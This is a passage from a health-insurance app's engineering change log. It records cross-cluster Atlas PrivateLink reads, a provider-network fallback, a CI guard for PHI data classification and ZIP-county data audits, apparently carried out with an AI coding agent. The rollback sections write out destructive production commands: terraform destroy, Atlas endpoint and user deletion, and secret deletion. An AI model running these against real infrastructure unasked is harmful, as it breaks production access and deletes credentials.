| SOC 2 | CC7.2 (additional row): detection of runtime privilege drift on cross-cluster reader | New row in docs/compliance/soc2/controls.md. Live nightly audit catches privilege drift the static guard cannot: Atlas Admin UI changes, out-of-band scripts, role escalation. |
| SOC 2 | CC8.1 (additional row): change management for cross-cluster reader role privileges | New row. Role tightened to per-collection custom role; constants duplicated between source-of-truth and audit script (defense-in-depth); quarterly review cadence aligned with STAGING_ALLOWED_COLLECTIONS. |
| HIPAA | §164.312(a)(1) Access Control + §164.308(a)(4) Information Access Management | Reinforced via principle of least privilege: cross-cluster reader can no longer see anything in the askflorence DB beyond the 2 collections it actually consumes. |
| EDE Phase 3 | Environment separation | Reinforced: the runtime audit closes the gap left by code-only enforcement. |

Open prerequisites (before nightly cron starts passing)

  • GH secrets ATLAS_DRIFT_CHECK_PUBLIC_KEY + ATLAS_DRIFT_CHECK_PRIVATE_KEY need to be provisioned before the next 08:00 UTC tick. Taha to create the Atlas Programmatic Key (Org Owner role required) scoped to Project Read Only on the staging project (NOT Org-level). The workflow ships ready to consume those secrets; cron runs will fail (no secrets → atlas CLI auth error) until they land. After provisioning, run gh workflow run staging-cluster-drift.yml --ref ci-guard-phase-2 manually to verify.

Cost outcome

Unchanged. CI minutes negligible (drift workflow runs once daily, completes in <1 min). No new AWS resources, no Atlas tier changes.

Outstanding follow-ups

  • GH secret provisioning (above) — blocks first green nightly run.
  • Quarterly review of STAGING_REFERENCE_READ_COLLECTIONS alongside STAGING_ALLOWED_COLLECTIONS per docs/security-compliance/vendor-register.md cadence — both must move in lock-step with role updates on Atlas.
  • Annual rotation of the gh-actions-staging-drift-check Atlas API key — first rotation due 2027-05-09.

2026-05-09T04:18Z — Phase D provider-network fallback shipped + facility/pharmacy autocomplete fix + CI guard Phase 1 (static check) ​

Actor: taha.abbasi via ~/Developer/ask-florence-doctor-rx/ worktree (branch doctor-rx-flow); agent: Claude Opus 4.7 (1M context)

Linked: #96 / ENG-234 Phase D shipped + closed; #100 / ENG-239 CI guard Phase 1 of 2; #106 / ENG-245 (NEW) pharmacy network lookup; #107 (NEW) drug coverage checker product idea; #108 (NEW) clear-all button. Closed: GH #17, #18, #20. Commits: 1465c6d (Phase D + autocomplete), 40a4a3a (diagnostic), 67cb315 (CI guard); Deploy run 25590973086 success in 6m43s, ECS revision 54.

Why ​

Phase 11 (yesterday's commit) wired the cross-cluster Atlas PrivateLink read path from prod to the staging cluster, with drug-tier-fallback for formularies_staging. The provider mirror (providers_staging reads via the same path) was the missing other half: Phase D. Same architecture, different collection. While verifying, we also found that the doctor-search UI hook hardcoded type: "Individual", so retail pharmacies (Walmart, Walgreens) were silently filtered out; that is fixed in the same change.

The CI guard came out of Phase 11's open-mitigations list: the staging cluster must stay non-PHI for the data-classification argument to hold (SOC 2 CC6.6 + EDE Phase 3 segregation). A future PR adding a cross-cluster read against a PHI-class collection would silently break that posture; we needed enforcement at build time.

What shipped ​

Code (commits 1465c6d + 67cb315):

  • src/lib/provider-network-fallback.ts (NEW) — lookupStagingProviderNetworks(npiPlanPairs) mirroring drug-tier-fallback.ts. Reads providers_staging via getReferenceDb(); returns Map of ${npi}|${plan_id} → network_tier. CMS coverage authoritative; staging fills the tier-omission gap.
  • src/app/api/providers/covered/route.ts — enrichment loop wired after CMS call (mirrors /api/drugs/covered).
  • src/app/api/providers/autocomplete/route.ts — server-side fan-out across Individual + Facility + Group when type is omitted or "All". Backwards-compatible: callers passing a specific type get the prior single-type behavior.
  • src/lib/hooks/use-doctor-autocomplete.ts — ProviderType union extended to include "Group" + "All"; default changed "Individual" → "All".
  • src/components/plans/CoveragePanel.tsx + src/components/plans/detail/PlanCoverageCheck.tsx — pass type: "All" with explanatory comment.
  • src/lib/db.ts — new STAGING_ALLOWED_COLLECTIONS constant (10 collections) + StagingAllowedCollection type. Source of truth for cross-cluster data-classification allow-list.
  • scripts/audit/staging-collections-guard.ts (NEW) — zero-dep regex-based static guard. Walks src/ + scripts/, finds every await getReferenceDb() binding + downstream .collection("…") calls, verifies against allow-list. Self-skip + comment-stripping defenses. Allow-list duplicated in script (defense-in-depth).
  • .github/workflows/staging-collections-guard.yml (NEW) — runs on PRs to main / staging / doctor-rx-flow + on push to main + on demand. Clear ::error:: output on failure with ADR 0004 pointer.
  • scripts/diag/check-walgreens-coverage.js (NEW, commit 40a4a3a) — diagnostic script that surfaced the pharmacy-network finding (medical services vs pharmacy network are separate data layers).

No infrastructure changes — all reads ride on the Phase 11 cross-cluster path established yesterday. No new AWS resources, no new Atlas resources.

Verification ​

Phase D end-to-end on prod:

  • POST askflorence.health/api/providers/covered with Walgreens NPI 1023023066 against issuer 42261's UT plans 42261UT0060023 + 42261UT0060026: returned coverage=Covered, network_tier="Preferred". The network_tier field is only populated by lookupStagingProviderNetworks() reading from providers_staging via the cross-cluster path. CMS returned Covered without tier; staging filled it. Sub-second latency on the AWS-backbone path.
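The enrichment behavior verified above can be sketched roughly as follows. This is a minimal illustration, not the code in provider-network-fallback.ts: the CoverageRow shape, the enrichWithStagingTiers helper, the sample map contents, and the rule that a CMS-supplied tier is never overwritten are all assumptions. Only the `${npi}|${plan_id}` key format and the network_tier field come from this entry.

```typescript
// Hypothetical row shape; the real CMS response carries more fields.
interface CoverageRow {
  npi: string;
  plan_id: string;
  coverage: string;      // e.g. "Covered"
  network_tier?: string; // often omitted by CMS
}

// Build the lookup key in the `${npi}|${plan_id}` format named in this entry.
function tierKey(npi: string, planId: string): string {
  return `${npi}|${planId}`;
}

// Fill in network_tier from the staging map only where CMS left it empty.
// CMS coverage stays authoritative: `coverage` is never modified.
function enrichWithStagingTiers(
  rows: CoverageRow[],
  stagingTiers: Map<string, string>,
): CoverageRow[] {
  return rows.map((row) => {
    if (row.network_tier !== undefined) return row;
    const tier = stagingTiers.get(tierKey(row.npi, row.plan_id));
    return tier === undefined ? row : { ...row, network_tier: tier };
  });
}

// Illustrative data: the map deliberately covers only one of the two plans.
const cmsRows: CoverageRow[] = [
  { npi: "1023023066", plan_id: "42261UT0060023", coverage: "Covered" },
  { npi: "1023023066", plan_id: "42261UT0060026", coverage: "Covered" },
];
const stagingTiers = new Map<string, string>([
  ["1023023066|42261UT0060023", "Preferred"],
]);
const enriched = enrichWithStagingTiers(cmsRows, stagingTiers);
```

Rows without a staging match pass through untouched, so a staging outage in this sketch degrades to "no tier" rather than changing the coverage answer.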

Walmart/Walgreens autocomplete fan-out on prod:

  • POST askflorence.health/api/providers/autocomplete {"q":"Walmart","zipcode":"84094"} (no type): 13 results merging Facility (WALMART INC. NPIs) + Group (SLC WALMART EYE DOCS).
  • Same for Walgreens: 21 results merging Individual (SARAH WALGREEN — actual person named Walgreen) + Facility (WALGREENS #XXXXX).
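The fan-out behind these merged results might look something like the sketch below. It assumes a per-type search has already produced one result list per provider type; the ProviderHit shape, the placeholder NPIs, and the "first hit per NPI wins" de-duplication rule are hypothetical and are not confirmed by this entry.

```typescript
type ProviderType = "Individual" | "Facility" | "Group" | "All";
type ConcreteType = Exclude<ProviderType, "All">;

// Hypothetical result shape for illustration only.
interface ProviderHit {
  npi: string;
  label: string;
  type: ConcreteType;
}

// Omitted or "All" fans out to every concrete type; a specific type keeps
// the prior single-type behavior.
function typesToQuery(type?: ProviderType): ConcreteType[] {
  if (type === undefined || type === "All") {
    return ["Individual", "Facility", "Group"];
  }
  return [type];
}

// Merge per-type result lists, keeping the first hit per NPI (assumed rule).
function mergeHits(lists: ProviderHit[][]): ProviderHit[] {
  const seen = new Set<string>();
  const merged: ProviderHit[] = [];
  for (const list of lists) {
    for (const hit of list) {
      if (seen.has(hit.npi)) continue;
      seen.add(hit.npi);
      merged.push(hit);
    }
  }
  return merged;
}

// Placeholder NPIs; the labels echo the result classes reported above.
const mergedHits = mergeHits([
  [],
  [{ npi: "0000000001", label: "WALMART INC.", type: "Facility" }],
  [
    { npi: "0000000002", label: "SLC WALMART EYE DOCS", type: "Group" },
    { npi: "0000000001", label: "WALMART INC.", type: "Group" },
  ],
]);
```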

CI guard static check:

  • Workflow run 25591499570 triggered automatically on first push to main — success in 42s.
  • Synthetic positive test: dropped temporary file under scripts/db/ with 3 known-bad patterns (string literal access to agent_audit_log, dynamic collection name, inline (await getReferenceDb()).collection("members")). All 3 caught with correct file:line + reason classification (not_on_allow_list / dynamic_name). Exit code 1 as expected.
  • Cleanup: removed synthetic file → guard returned to ✅ PASS, exit 0. No false-positive lingering in clean state.
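For readers unfamiliar with the approach, a regex-based check of this kind can be sketched as below. This is not the contents of staging-collections-guard.ts: the two-entry allow-list (only the collections named in this change log), the regexes, and the scanSource helper are assumptions, and the sketch skips the step of tracing getReferenceDb() bindings. Only the two reason labels come from the verification notes above.

```typescript
type Reason = "not_on_allow_list" | "dynamic_name";

interface Violation {
  line: number;
  reason: Reason;
  detail: string;
}

// Illustrative allow-list: the real constant holds 10 collections.
const ALLOWED = new Set(["formularies_staging", "providers_staging"]);

// Matches `.collection(<arg>)` and captures the raw argument text.
const COLLECTION_CALL = /\.collection\(\s*([^)]*?)\s*\)/g;
// A plain quoted name with no interpolation or concatenation.
const STRING_LITERAL = /^(["'`])([A-Za-z0-9_.-]+)\1$/;

function scanSource(source: string): Violation[] {
  const violations: Violation[] = [];
  source.split("\n").forEach((text, index) => {
    // Strip single-line comments so commented-out code is not flagged.
    // (Naive: this would also cut a "//" that appears inside a string.)
    const code = text.replace(/\/\/.*$/, "");
    for (const match of code.matchAll(COLLECTION_CALL)) {
      const arg = match[1];
      const literal = STRING_LITERAL.exec(arg);
      if (literal === null) {
        violations.push({ line: index + 1, reason: "dynamic_name", detail: arg });
      } else if (!ALLOWED.has(literal[2])) {
        violations.push({ line: index + 1, reason: "not_on_allow_list", detail: literal[2] });
      }
    }
  });
  return violations;
}

// Mirrors the three known-bad patterns from the synthetic test above.
const sample = [
  "const db = await getReferenceDb();",
  'db.collection("providers_staging");',
  'db.collection("agent_audit_log");',
  "db.collection(collectionName);",
  '(await getReferenceDb()).collection("members");',
  '// db.collection("members")',
].join("\n");
const found = scanSource(sample);
```

A script built this way would exit non-zero whenever the violations list is non-empty, which is what lets the workflow block a PR.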

ECS state post-deploy: task def revision 54, 2/2 tasks running, rolloutState=COMPLETED.

Compliance posture impact ​

| Framework | Control | Status |
|---|---|---|
| SOC 2 | CC7.2 (additional row) — detection of unauthorized cross-cluster data-flow scope | New row in docs/compliance/soc2/controls.md. Static guard catches PHI-class collection introduction at PR time. |
| SOC 2 | CC8.1 — change management for non-prod-isolation invariants | New CC8.1 row. Cross-cluster scope changes can't merge without explicit allow-list expansion. Quarterly review cadence per vendor register. |
| SOC 2 | CC8.1 — change management (existing posture) | Phase D + Walmart fix landed via standard PR + commit + CI + Deploy prod workflow chain — full evidence trail in commit messages + this change-log + the session log. |
| HIPAA | §164.312(e)(1) Transmission Security | Unchanged from Phase 11; cross-cluster path stays TLS + AWS-backbone-only. |
| EDE Phase 3 | Environment separation | Reinforced — CI guard now algorithmically enforces what was previously hand-discipline. |

Pharmacy-network gap surfaced + filed separately ​

While verifying Phase D, we found that retail pharmacy NPIs in providers_staging represent the medical services those pharmacies provide (vaccinations, screenings, in-store retail clinics), NOT pharmacy-network membership for prescription dispensing. Confirmed by reading SelectHealth's published §1311 index.json directly: the provider file lists medical providers only; the pharmacy network lives in a separate RxEOB SPA tool.

Filed as #106 / ENG-245 with two-part scope: Part A UX clarity (this cycle, due 2026-05-15) + Part B pharmacy-network data ingest (multi-week). Diagnostic at scripts/diag/check-walgreens-coverage.js is the evidence base.

Cost outcome ​

Unchanged from Phase 11: ~$438/mo for the two clusters ($56 prod M10 + $382 staging M30), plus the ~$7-10/mo Interface endpoint. Phase D + CI guard add zero recurring cost (CI minutes negligible).

Outstanding follow-ups ​

  • CI guard Phase 2 (live nightly drift check) — sub-task on #100 / ENG-239. Open design question: live check should verify role-based permissions on app_read_staging (Atlas API call), not just collection enumeration (would false-positive on staging-app data legitimately on the cluster).
  • #106 / ENG-245 — Pharmacy network lookup Part A (UX) due 2026-05-15.
  • #92 / ENG-230 — Re-validate §1311 audit at 100% match (cycle 1, due 2026-05-11).
  • Other cycle-1 items per Linear: ENG-227, ENG-228, ENG-231, ENG-232, ENG-233, ENG-236.

Rollback ​

```bash
# Code rollback (any of the three commits):
git revert 67cb315  # CI guard
git revert 1465c6d  # Phase D + autocomplete fix
git revert 40a4a3a  # Diagnostic script
git push origin main

# Infrastructure: no changes to roll back. All work was application-layer.

# CI guard temporary disable (if it produces unexpected failures):
# Edit .github/workflows/staging-collections-guard.yml — comment out the
# `npx tsx scripts/audit/staging-collections-guard.ts` step. Do NOT delete
# the workflow file (history matters for SOC 2 CC8.1 evidence).
```

2026-05-09T01:08Z — Phase 11 cross-cluster Atlas reads from prod via AWS PrivateLink ​

Actor: taha.abbasi via ~/Developer/ask-florence-doctor-rx/ worktree (branch doctor-rx-flow); agent: Claude Opus 4.7 (1M context)

Linked: ADR 0004; session log 2026-05-08-phase-11-cross-cluster-privatelink; issues #101 (umbrella + decision matrix), #100 (CI guard, NEW), #57, #71, #96, #98; commits 2bba8d4 feat(db): add getReferenceDb(), dd06efe feat(infra): Phase 11, merge commit 1ac9a58; Deploy prod run 25587085583

Why ​

Doctor + Rx coverage flow on prod was returning empty tier metadata for tier-fallback-eligible drugs (e.g. Eliquis 2.5mg comes back from CMS API as Covered with no drug_tier). The fallback code path needs to read 12,557 RxCUI / ~30M drug-plan tuples from formularies_staging — a non-PHI public CMS marketplace dataset that canonically lives on the staging Atlas cluster (M30, ~$382/mo).

Three paths considered (full analysis: ADR 0004 + decision-matrix comment on #101):

  • Path A — duplicate data on prod cluster: would force prod M10 → M30 (+$326/mo recurring). Rejected on cost + audit-surface mixing.
  • Path B — VPC peering prod ↔ staging Atlas: blocked by CIDR conflict (both Atlas projects use default 192.168.248.0/21).
  • Path B1 — AWS PrivateLink (chosen): AWS-backbone-only, identity-bound, no CIDR involvement, ~$7-10/mo for the Interface endpoint.
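The CIDR conflict that ruled out Path B can be checked mechanically. The sketch below is a generic IPv4 overlap test written for illustration; cidrRange and cidrsOverlap are hypothetical helpers, not part of the repository. Two peered networks need non-overlapping ranges, and two projects on the same default block overlap completely.

```typescript
// Parse "a.b.c.d/n" into an inclusive [start, end] range of 32-bit integers.
function cidrRange(cidr: string): [number, number] {
  const [ip, bitsText] = cidr.split("/");
  const bits = Number(bitsText);
  const octets = ip.split(".").map(Number);
  const badOctets =
    octets.length !== 4 ||
    octets.some((o) => !Number.isInteger(o) || o < 0 || o > 255);
  if (badOctets || !Number.isInteger(bits) || bits < 0 || bits > 32) {
    throw new Error(`invalid CIDR: ${cidr}`);
  }
  // Plain arithmetic instead of bit shifts to avoid signed 32-bit overflow.
  const addr = octets.reduce((acc, o) => acc * 256 + o, 0);
  const size = 2 ** (32 - bits);
  const start = Math.floor(addr / size) * size;
  return [start, start + size - 1];
}

// Two ranges overlap when each one starts before the other ends.
function cidrsOverlap(a: string, b: string): boolean {
  const [aStart, aEnd] = cidrRange(a);
  const [bStart, bEnd] = cidrRange(b);
  return aStart <= bEnd && bStart <= aEnd;
}

// Both Atlas projects on the default block: peering is not possible.
const sameDefaultBlock = cidrsOverlap("192.168.248.0/21", "192.168.248.0/21");
```

PrivateLink sidesteps the question because traffic goes through an Interface endpoint inside the consumer VPC rather than routing between the two address ranges.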

What shipped ​

Atlas (CLI):

  • Atlas PrivateLink endpoint service created on staging project 69e31af12fd2c0aef51bbb41 — Atlas endpointId 69fe75c5b02c024f32d2af50, AWS service name com.amazonaws.vpce.us-east-1.vpce-svc-0d8138ea0f6542afa
  • AWS-side VPC endpoint approved by Atlas; connectionStatus=AVAILABLE both sides
  • Atlas database user app_read_staging created with read-only role on askflorence database

AWS (Terraform — infra/envs/prod/):

  • NEW atlas-staging-privatelink.tf — aws_security_group (MongoDB ports from prod VPC CIDR) + aws_vpc_endpoint (multi-AZ Interface endpoint, vpce-0c81aea11e29bb928 in prod VPC vpc-09201679b87261b6d, private_dns_enabled = false since Atlas issues its own DNS via private connection string)
  • secrets.tf — added mongodb/reference-uri entry (data_class = "public", project CMK encrypted)
  • ecs.tf — added MONGODB_REFERENCE_URI to secrets_from_manager map
  • .gitignore — added infra/**/*.tfvars + *.tfvars.json defensive ignore (no tfvars exist; future-proofing)

ECS (CLI bridge — Terraform module's lifecycle.ignore_changes = [container_definitions] means CI/CD owns task-def revisions, not Terraform):

  • Task def revision 52 registered with the new env binding bound to the new secret ARN
  • Service rolled to revision 52 — 2/2 tasks running, rolloutState=COMPLETED
  • Subsequent Deploy prod workflow run from main (1ac9a58) registered revision 53 with the new container image baked from getReferenceDb() code; service rolled to revision 53 cleanly

Code (commits on main):

  • src/lib/db.ts — added getReferenceDb() two-pool helper. MONGODB_REFERENCE_URI falls back to MONGODB_URI when unset (dev + staging unaffected)
  • src/lib/drug-tier-fallback.ts — switched from getDb() to getReferenceDb()
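The fallback rule for the reference pool can be sketched as a pure function. This is an illustration under assumptions, not the code in src/lib/db.ts: resolveReferenceUri and needsSecondPool are hypothetical names, the environment is passed in as a plain object rather than read from the process, and treating an empty string as "unset" is a guess.

```typescript
type Env = Record<string, string | undefined>;

// Resolve the URI for the reference (staging) pool. When
// MONGODB_REFERENCE_URI is unset or empty, fall back to MONGODB_URI so dev
// and staging keep talking to a single cluster.
function resolveReferenceUri(env: Env): string {
  const uri = env.MONGODB_REFERENCE_URI || env.MONGODB_URI;
  if (!uri) throw new Error("MONGODB_URI is not set");
  return uri;
}

// True when the reference pool points at a different cluster than the
// primary pool, i.e. when a second connection pool is actually needed.
function needsSecondPool(env: Env): boolean {
  return resolveReferenceUri(env) !== env.MONGODB_URI;
}

// Placeholder URIs for illustration only.
const prodEnv: Env = {
  MONGODB_URI: "mongodb://primary.example/askflorence",
  MONGODB_REFERENCE_URI: "mongodb://reference.example/askflorence",
};
const devEnv: Env = { MONGODB_URI: "mongodb://localhost/askflorence" };
```

With prodEnv the helper returns the reference URI and a second pool is warranted; with devEnv both pools resolve to the same URI, which matches the "dev + staging unaffected" note above.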

Documentation:

  • ADR 0004 NEW
  • Decision doc docs/decisions/2026-05-03-pivot-cms-api-direct.md — full PrivateLink section
  • SOC 2 controls docs/security-compliance/soc2-control-mapping.md — CC6.6 (additional row) + CC6.7
  • Vendor register docs/security-compliance/vendor-register.md — both Atlas project IDs enumerated
  • MongoDB setup runbook docs/infrastructure/mongodb-setup.md — cross-cluster reference reads section
  • Data classification docs/infrastructure/data-classification.md — formularies_staging + providers_staging collection rows
  • Atlas user provisioning runbook docs/runbooks/atlas-user-provisioning.md — app_read_staging step
  • Session log 2026-05-08-phase-11-cross-cluster-privatelink

Verification ​

  • End-to-end on prod: POST askflorence.health/api/drugs/covered with Eliquis 2.5mg (RxCUI 1364441) on 8 UT plans returned drug_tier=PreferredBrand + plan-specific UM flags. The drug_tier field is only populated by lookupStagingDrugTiers() reading from formularies_staging via the cross-cluster path — its presence proves the path is operational. Sub-second latency (~225-465ms).
  • Atlas PrivateLink describe: status=AVAILABLE, interface endpoint vpce-0c81aea11e29bb928 attached.
  • ECS service: revision 53, 2/2 tasks running, rolloutState=COMPLETED.

Compliance posture impact ​

| Framework | Control | Status |
|---|---|---|
| HIPAA | §164.312(e)(1) Transmission Security | TLS at app layer + AWS-backbone-only at network layer (PrivateLink). Doubly-protected. |
| SOC 2 | CC6.6 — restrictions on logical access from outside boundaries | New row added: cross-cluster reads identity-bound at AWS account + Atlas auth. |
| SOC 2 | CC6.7 — transmission encryption | New row added: TLS-only Atlas + PrivateLink. No public-network exposure. |
| SOC 2 | CC8.1 — change management | This change-log entry + session log + ADR 0004 + #101 = full evidence trail. |
| CMS EDE Phase 3 | Environment separation + audit boundary | PHI on prod cluster only. Non-PHI public reference data on staging only. One-way private read. Audit narrative is clean. |

Cost outcome ​

| Component | Tier | Monthly | Notes |
|---|---|---|---|
| Prod cluster askflorence-prod-01 | M10 HIPAA | ~$56 | Unchanged, PHI-scope only |
| Staging cluster askflorence-staging | M30 | ~$382 | Unchanged, holds public CMS reference data |
| AWS Interface VPC Endpoint | n/a | ~$7-10 | Hourly fee + negligible data egress |
| Total | | ~$445/mo | |
| (avoided) duplicate-on-prod path | M30 prod + M30 staging | ~$764 | Would have doubled tier cost |
| Savings | | ~$319/mo | |

Rollback ​

```bash
# Application: revert env binding via Terraform-managed redeploy.
# Code path falls back to MONGODB_URI; drug-tier enrichment becomes silently
# unavailable on prod, CMS coverage stays authoritative.

# Infra:
AWS_PROFILE=askflorence-prod terraform -chdir=infra/envs/prod destroy \
  -target=aws_vpc_endpoint.atlas_staging \
  -target=aws_security_group.atlas_staging_privatelink

# Atlas:
atlas privateEndpoints aws delete 69fe75c5b02c024f32d2af50 \
  --projectId 69e31af12fd2c0aef51bbb41 --force
atlas dbusers delete app_read_staging \
  --projectId 69e31af12fd2c0aef51bbb41 --force

# Secret (30-day recovery window):
aws secretsmanager delete-secret \
  --secret-id prod/mongodb/reference-uri \
  --recovery-window-in-days 30
```

Outstanding follow-ups ​

  • #100 — CI guard against staging cluster data-classification drift (NEW today, P1)
  • #71 — staging IP allowlist hardening (post-launch only — pre-launch ingest still needs IP-based access)
  • #57 — confirm Atlas BAA enumeration covers both project IDs in writing
  • #96 — Phase D provider-network fallback (same pattern, different collection — cross-cluster path already wired)
  • #98 — delta-aware MRF refresh pipeline (now has clear architectural target)

2026-05-01T23:38Z — Tier 0.5 drive-to-100% (Tier 1 + Tier 1.5 audits at TRUE 100% match) ​

Actor: taha.abbasi via tier-0-5-federal-completeness-audit worktree; agent: Claude Opus 4.7

Linked: #80 execution tracker; commits 474f47a + 21643d2 (Phase 9 docs); this commit (Phase 8b artifacts).

Why ​

Initial post-Tier-0.5 audits showed Tier 1 = 99.84%, Tier 1.5 = 99.80%. User direction: "I need to see 100% match but not to get there just to get there - identify the issues and suggest how to validate even if it is because of rate limit." Built three audit-driven validation paths to drive to TRUE 100%, not explanation-driven 99.x%.

What shipped ​

A: rate-limit retry validation (scripts/audit/validate-cms-errors.js)

  • Loads each tier's cmsErrors list, retries at concurrency=1 with exponential backoff (5s/10s/20s/40s/80s), classifies each retry as match/mismatch/still-failed
  • Tier 1 result: 33/33 retried = MATCH
  • Tier 1.5 result: 26/26 retried = MATCH
  • No real mismatches were hiding behind rate-limit failures
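A retry pass of this shape could be sketched as follows. The 5s/10s/20s/40s/80s schedule and the three outcome labels come from the list above; everything else is assumed for illustration, including the retryAndClassify name, the fetchCms callback, and the choice to wait before every retry on the grounds that the initial attempt has already failed.

```typescript
type RetryClass = "match" | "mismatch" | "still-failed";

// Delay schedule: the base doubles on each attempt (5s, 10s, 20s, 40s, 80s).
function backoffDelaysMs(baseMs: number, attempts: number): number[] {
  return Array.from({ length: attempts }, (_, i) => baseMs * 2 ** i);
}

const sleep = (ms: number): Promise<void> =>
  new Promise<void>((resolve) => setTimeout(resolve, ms));

// Retry one lookup sequentially (concurrency = 1). `fetchCms` is a
// hypothetical callback that resolves to the CMS value or throws on a
// rate-limit or transport error.
async function retryAndClassify<T>(
  fetchCms: () => Promise<T>,
  ours: T,
  isEqual: (a: T, b: T) => boolean,
  delaysMs: number[] = backoffDelaysMs(5000, 5),
  wait: (ms: number) => Promise<void> = sleep,
): Promise<RetryClass> {
  for (const delay of delaysMs) {
    await wait(delay);
    try {
      const theirs = await fetchCms();
      return isEqual(ours, theirs) ? "match" : "mismatch";
    } catch {
      // Still failing: fall through to the next, longer delay.
    }
  }
  return "still-failed";
}

const schedule = backoffDelaysMs(5000, 5);
```

Passing `wait` as a parameter lets a test substitute an instant no-op, so the classification logic can be exercised without sleeping through the full schedule.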

B: Tier 1 audit-script patch (scripts/audit/tier-1-zip-county.js)

  • Pre-fetches all (zip, fips) tuples from unsupported-class or non-federal-state docs at script start, subtracts them from CMS-side comparison
  • Resolves the 96898 Marshall Islands false positive (audit was excluding our MH/Kwajalein doc from "ours" via unsupported: {$exists: false} filter but didn't subtract the equivalent CMS tuple)
  • Patch is permanent; benefits all future Tier 1 runs
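The asymmetry this patch fixes is easier to see in code. The sketch below is a simplified model, not the audit script: the ZipCounty shape and helper names are hypothetical, and the FIPS value paired with 96898 is a placeholder rather than the real code.

```typescript
interface ZipCounty {
  zip: string;
  fips: string;
}

const tupleKey = (t: ZipCounty): string => `${t.zip}|${t.fips}`;

// Remove from the CMS side every tuple that our side deliberately excludes,
// so both sides of the comparison cover the same universe.
function subtractExcluded(cms: ZipCounty[], excluded: ZipCounty[]): ZipCounty[] {
  const skip = new Set(excluded.map(tupleKey));
  return cms.filter((t) => !skip.has(tupleKey(t)));
}

// Tuples CMS has that we lack are reported as mismatches.
function missingFromOurs(cms: ZipCounty[], ours: ZipCounty[]): ZipCounty[] {
  const have = new Set(ours.map(tupleKey));
  return cms.filter((t) => !have.has(tupleKey(t)));
}

// "PLACEHOLDER" stands in for the real county code of the excluded doc.
const excludedDocs: ZipCounty[] = [{ zip: "96898", fips: "PLACEHOLDER" }];
const oursFiltered: ZipCounty[] = [{ zip: "85001", fips: "04013" }];
const cmsSide: ZipCounty[] = [
  { zip: "85001", fips: "04013" },
  { zip: "96898", fips: "PLACEHOLDER" },
];

const beforePatch = missingFromOurs(cmsSide, oursFiltered);
const afterPatch = missingFromOurs(subtractExcluded(cmsSide, excludedDocs), oursFiltered);
```

Before the subtraction the excluded tuple shows up as a mismatch even though the database holds it; after the subtraction the two sides agree.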

C: tuple-completeness fix script (scripts/db/fix-tier-1-completeness-gaps.js)

  • Hardcoded list of (zip, countyFips) docs surfaced by Tier 1 mismatches that Tier 0.5's zip-level gap detection missed
  • Same safety pattern as fix-federal-zip-gaps.js (idempotency, state allowlist, three-mode CLI, rollback marker)
  • Marker: _seedSource: "tier-1-completeness-fix-2026-05-01" (separate from Tier 0.5 marker for surgical rollback boundary)
  • First entry: 50613 IA / Bremer County (FIPS 19017) / Rating Area 7 - validated via 5x CMS lookup (5/5 returned Bremer) + regionMap availability (13 IA/19017 sibling docs all use Rating Area 7)
  • Applied 1 doc on prod with full Constraint 1+2 protocol: backup tag pre-tier-1-completeness-fix-50613-20260501T231959Z (52,595 records, sha256 709bef08...); pre-apply 52,595 -> post-apply 52,596 (delta +1 exact)
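The safety pattern named above (idempotent insert, rollback by marker, exact delta) can be modeled in memory as below. This is a sketch under assumptions and not the fix script itself: it uses a plain array in place of a MongoDB collection, and the applyFix and rollback helpers are hypothetical. The marker string and the 50613 / 19017 tuple are taken from this entry.

```typescript
interface ZipCountyDoc {
  zip: string;
  countyFips: string;
  _seedSource?: string;
}

const MARKER = "tier-1-completeness-fix-2026-05-01";

// Insert only tuples that are not already present, and tag each insert with
// the marker so a rollback removes exactly these docs and nothing else.
function applyFix(collection: ZipCountyDoc[], fixes: ZipCountyDoc[]): number {
  let insertedCount = 0;
  for (const fix of fixes) {
    const exists = collection.some(
      (d) => d.zip === fix.zip && d.countyFips === fix.countyFips,
    );
    if (exists) continue; // idempotent: a second run inserts nothing
    collection.push({ ...fix, _seedSource: MARKER });
    insertedCount += 1;
  }
  return insertedCount;
}

// Remove only docs carrying this script's marker; returns the number removed.
function rollback(collection: ZipCountyDoc[]): number {
  const before = collection.length;
  const kept = collection.filter((d) => d._seedSource !== MARKER);
  collection.length = 0;
  collection.push(...kept);
  return before - kept.length;
}

const docs: ZipCountyDoc[] = [{ zip: "85001", countyFips: "04013" }];
const fixes: ZipCountyDoc[] = [{ zip: "50613", countyFips: "19017" }];
const firstRun = applyFix(docs, fixes);  // inserts the Bremer County doc
const secondRun = applyFix(docs, fixes); // no-op on re-run
const sizeAfterApply = docs.length;
const removedCount = rollback(docs);
```

Comparing the collection size before and after the apply against the returned insert count is the in-memory analogue of the "delta +1 exact" check.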

Verification ​

  • Tier 1 (patched + post-50613-fix, fresh re-run): 22,302/22,302 = 100.00% exact match, 0 mismatches, 0 extras, 1 transient rate-limit error (validated as MATCH on retry)
  • Tier 1.5: 13,055/13,055 = 100.00% exact match (after rate-limit retries)
  • Tier 0.5 re-run: 0 gap zips remaining
  • Calculator baseline diff: ZERO DIFFS on all 12 scenarios
  • Smoke tests: 50613 prod /api/counties returns 4 counties (Black Hawk + Bremer + Butler + Grundy); 85001 still resolves correctly

Compliance posture impact ​

| Framework | Control | Status |
|---|---|---|
| SOC 2 | CC8.1 - Change management | All 4 batches (Tier 0.5 x3 + Tier 1-completeness-fix x1) preceded by verified mongodump backups + sha256 + rollback paths documented |
| EDE Phase 3 | Data integrity validation | Tier 1 + Tier 1.5 at TRUE 100% match against CMS Marketplace API; rate-limit ambiguity systematically resolved via retry-validation rather than explained away |

Rollback ​

```bash
# Targeted (preferred): rollback the 50613 fix only
node scripts/db/fix-tier-1-completeness-gaps.js --rollback
# Removes 1 doc with _seedSource: "tier-1-completeness-fix-2026-05-01"
```

The audit-script patch in scripts/audit/tier-1-zip-county.js can be rolled back via git revert if needed.

Outstanding follow-ups (unchanged from prior entry) ​

Same list as the 2026-05-01T22:30Z Tier 0.5 entry: S3 backup access for SSO admin role, Tier 0.5b tuple-level audit, HUD ZIP-County crosswalk upgrade, calculator 404 message refinement.


2026-05-01T22:30Z — Tier 0.5 federal+NY ZIP USPS-completeness audit + apply (4,363 docs) ​

Actor: taha.abbasi via tier-0-5-federal-completeness-audit worktree; agent: Claude Opus 4.7 (Tier 0.5 audit + 3-batch apply)

Linked: #80 execution tracker; parent #79 (gap class scoping); commits 7b716d0 (audit + scripts), 749a13d (seed), this commit (docs).

Why ​

